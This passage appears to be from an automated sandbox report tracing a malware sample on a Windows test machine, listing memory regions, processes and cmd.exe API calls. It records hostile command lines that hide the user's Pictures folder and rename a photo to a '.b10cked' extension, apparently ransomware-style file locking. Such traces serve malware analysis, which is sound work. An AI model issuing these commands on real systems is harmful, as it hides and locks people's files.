entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16510 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16511 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16512 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16513 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 16514 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16515 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 240 os_tid = 0x894 Process: id = "184" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b80" os_pid = 
"0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16582 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16583 start_va = 0x750000 end_va = 0x756fff entry_point = 0x750000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16586 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16587 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16590 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16591 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 16592 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16593 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16594 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16595 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16596 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16597 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16598 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16599 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16600 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16601 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16602 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16603 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16606 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 16607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 241 os_tid = 0x7b8 Process: id = "185" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16621 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16622 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16623 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16624 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = 
"private_0x00000000001d0000" filename = "" Region: id = 16625 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16626 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16627 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16628 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16629 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 16630 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16811 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16812 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16813 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16814 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 16815 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" 
filename = "" Region: id = 16816 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16817 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16818 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16819 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16820 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16821 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16822 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16823 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16824 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" 
Region: id = 16825 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16826 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16827 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16828 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16829 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16830 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16831 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16832 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 16833 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 16834 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 242 os_tid = 0x8cc [0143.781] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff6c | out: lpSystemTimeAsFileTime=0x2cff6c*(dwLowDateTime=0x8fa317a0, dwHighDateTime=0x1d440a9)) [0143.782] GetCurrentProcessId () returned 0x934 [0143.782] GetCurrentThreadId () returned 0x8cc [0143.782] GetTickCount 
() returned 0x2ce94 [0143.782] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff64 | out: lpPerformanceCount=0x2cff64*=20057081466) returned 1 [0143.782] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.782] __set_app_type (_Type=0x1) [0143.782] __p__fmode () returned 0x76b331f4 [0143.782] __p__commode () returned 0x76b331fc [0143.782] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.782] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.783] GetCurrentThreadId () returned 0x8cc [0143.783] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8cc) returned 0x38 [0143.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.783] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.783] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.783] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.783] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfefc | out: phkResult=0x2cfefc*=0x0) returned 0x2 [0143.783] VirtualQuery (in: lpAddress=0x2cff33, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d1000, 
AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.783] GetConsoleOutputCP () returned 0x1b5 [0143.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.783] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.784] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.784] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.784] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.784] GetEnvironmentStringsW () returned 0x400150* [0143.784] FreeEnvironmentStringsW (penv=0x400150) returned 1 [0143.785] GetEnvironmentStringsW () returned 0x400150* [0143.785] FreeEnvironmentStringsW (penv=0x400150) returned 1 [0143.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee6c | out: phkResult=0x2cee6c*=0x40) returned 0x0 
[0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x78, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x0, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegCloseKey (hKey=0x40) returned 0x0 [0143.785] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee6c | out: phkResult=0x2cee6c*=0x40) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x0, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.786] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.786] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.786] RegCloseKey (hKey=0x40) returned 0x0 [0143.786] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.786] srand (_Seed=0x5b886372) [0143.786] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" [0143.786] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" [0143.786] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.786] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.787] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.787] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.787] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.787] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.787] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.787] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.787] GetEnvironmentStringsW () returned 0x4022a0* [0143.787] FreeEnvironmentStringsW (penv=0x4022a0) returned 1 [0143.787] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.787] GetEnvironmentVariableW 
(in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.787] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.787] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.788] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.788] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.788] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfc38, lpFilePart=0x2cfc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfc34*="Desktop") returned 0x18 [0143.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.788] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.788] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.788] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.788] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.789] 